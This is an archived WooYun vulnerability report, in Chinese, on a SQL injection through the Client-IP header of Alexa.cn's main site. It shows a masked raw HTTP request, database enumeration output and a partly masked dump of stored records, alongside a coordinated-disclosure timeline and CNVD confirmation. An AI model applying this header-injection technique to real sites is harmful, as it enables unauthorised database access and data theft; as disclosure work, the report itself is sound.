乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
学学猪猪侠的标题Alexa.cn_www主站DBA注入
GET / HTTP/1.1Host: **.**.**.**Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: checkdom=**.**.**.**%7C**.**.**.**%7C**.**.**.**%7C**.**.**.**%7C**.**.**.**Client-IP:**.**.**.***
注入点:Client-IP
available databases [12]:[*] alexa[*] beta_tel[*] icpdb[*] information_schema[*] mysql[*] performance_schema[*] test[*] tour2013[*] whoisdb[*] xj_cn_2014[*] xj_cn_2014_bak[*] xjzx
current database: 'alexa'
*****e: a**********----+--********** | E**********----+--********** | 3********** | 2********** | 2********** | 7********** | 6********** | 5********** | 4**********ory | 1********** | 1********** | 7********** | 6**********cs | 4********** | 1**********----+--*****
dump一点点
*****---------------------------********** **********---------------------------**********||香港||Microsoft-IIS/6************.**.**||IANA||-||-||- **********CHINA.COM||IANA||-||-||- ************||香港||IIS||HTTP/1.1 2************||浙江省杭州市||Date:**********|广东省广州市||DnionOS/**********||北美地区||-||-||- ************.**||美国||nginx||HTTP/1***********||美国|| **********^^斯达黎加||Date: **********||吉林省吉林市||Apache/2***********.**||香港||||HTTP/1.1 ***********||世界||cloudflare-ng***********||广东省深圳市||Cdn ************||北京市|| **********|浙江省杭州市||TornadoSe***********.**||上海市||Server: **********||广东省广州市||Date: ************.**||北京市||Apache||*****
危害等级:高
漏洞Rank:11
确认时间:2015-11-20 14:59
CNVD确认所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无